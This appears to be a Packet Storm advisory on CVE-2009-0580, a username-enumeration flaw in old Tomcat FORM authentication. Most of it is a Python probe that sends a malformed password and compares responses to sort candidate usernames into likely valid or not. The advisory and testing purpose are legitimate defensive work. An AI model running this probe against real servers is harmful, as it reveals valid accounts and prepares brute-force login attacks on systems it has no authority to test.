Due to insufficient error checking in some authentication classes, Tomcat allows enumeration (brute-force testing) of usernames: a login request that carries an illegally URL-encoded password produces a different error response depending on whether the supplied username exists, so an attacker can test candidate names without knowing any password. Affected versions are Tomcat 6.0.0 to 6.0.18, Tomcat 5.5.0 to 5.5.27 and Tomcat 4.1.0 to 4.1.39; the issue is fixed in Tomcat 6.0.20, 5.5.28 and 4.1.40.
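The following Python 3 probe is an added example for testing whether a FORM-authenticated webapp exposes this side channel; it is not code from the advisory or from the Apache Tomcat project. It assumes a standard Servlet FORM login (POST to <context>/j_security_check with j_username and j_password), uses a constructed illegal escape "%zz" as the password, and treats any divergence in status code or body length from a known-nonexistent baseline user as the signal, because the advisory does not state which responses Tomcat returns in each case.

```python
"""Probe a Tomcat FORM-auth webapp for the CVE-2009-0580 username side channel.

Added example, not code from the advisory or from Apache Tomcat. Assumptions:
standard Servlet FORM login (POST to <context>/j_security_check with
j_username/j_password), a constructed illegal escape "%zz" as the password,
and "any divergence from a known-nonexistent baseline user" as the signal.
"""
import http.client
from urllib.parse import quote, urlsplit

# Constructed probe value: '%' followed by non-hex characters is not a legal
# percent-escape. The advisory does not specify a particular byte sequence.
BAD_ENCODED_PASSWORD = "%zz"


def build_login_body(username, bad_password=BAD_ENCODED_PASSWORD):
    """Form body for j_security_check. The username is percent-encoded normally;
    the password is inserted raw so the illegal escape reaches the server."""
    return "j_username=%s&j_password=%s" % (quote(username, safe=""), bad_password)


def fingerprint(status, body):
    """Reduce a response to the features that distinguish error paths.
    Assumption: status code plus body length; no particular status is
    hard-coded because the advisory does not state the exact responses."""
    return (status, len(body))


def classify(fingerprints, baseline_user):
    """Mark every candidate whose fingerprint differs from the baseline
    (known-nonexistent) user as 'divergent'; those are the likely valid names."""
    base = fingerprints[baseline_user]
    return {user: ("divergent" if fp != base else "same-as-baseline")
            for user, fp in fingerprints.items() if user != baseline_user}


def _connect(base_url, timeout):
    parts = urlsplit(base_url)
    cls = http.client.HTTPSConnection if parts.scheme == "https" else http.client.HTTPConnection
    return cls(parts.netloc, timeout=timeout), parts.path.rstrip("/")


def probe(base_url, protected_path, username, timeout=10.0):
    """One round trip: GET a protected page so Tomcat creates the session that
    j_security_check expects, then POST the malformed login with that cookie."""
    conn, context = _connect(base_url, timeout)
    conn.request("GET", context + protected_path)
    first = conn.getresponse()
    first.read()
    cookies = first.headers.get_all("Set-Cookie") or []
    session = next((c.split(";", 1)[0] for c in cookies if c.startswith("JSESSIONID=")), None)
    body = build_login_body(username)
    headers = {"Content-Type": "application/x-www-form-urlencoded",
               "Content-Length": str(len(body))}
    if session:
        headers["Cookie"] = session
    conn.request("POST", context + "/j_security_check", body=body, headers=headers)
    resp = conn.getresponse()
    data = resp.read()
    conn.close()
    return fingerprint(resp.status, data)


def enumerate_users(base_url, protected_path, candidates, baseline_user="zz-no-such-user-zz"):
    """Probe the baseline twice to confirm its fingerprint is stable, then each candidate."""
    base_a = probe(base_url, protected_path, baseline_user)
    base_b = probe(base_url, protected_path, baseline_user)
    if base_a != base_b:
        raise RuntimeError("baseline response is not stable; refine fingerprint()")
    fps = {baseline_user: base_a}
    for user in candidates:
        fps[user] = probe(base_url, protected_path, user)
    return classify(fps, baseline_user)


if __name__ == "__main__":
    import sys
    # usage: python probe.py http://host:8080/app /secure/ tomcat admin alice
    url, path, *names = sys.argv[1:]
    for user, verdict in enumerate_users(url, path, names).items():
        print(user, verdict)
```

The baseline is probed twice before any candidate so that a noisy response (for example a page that embeds a session identifier of varying length) is caught instead of being reported as a hit; if that check fails, fingerprint() needs a more robust feature than body length. A "divergent" verdict is evidence of the discrepancy, not proof the account exists, so confirm on a patched instance (6.0.20, 5.5.28 or 4.1.40) that the verdicts collapse to "same-as-baseline".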
You can download this advisory from the following link: https://packetstormsecurity.com/files/download/78090/CVE-2009-0580.txt
Source: https://packetstormsecurity.com/files/78090/Tomcat-Information-Disclosure.html

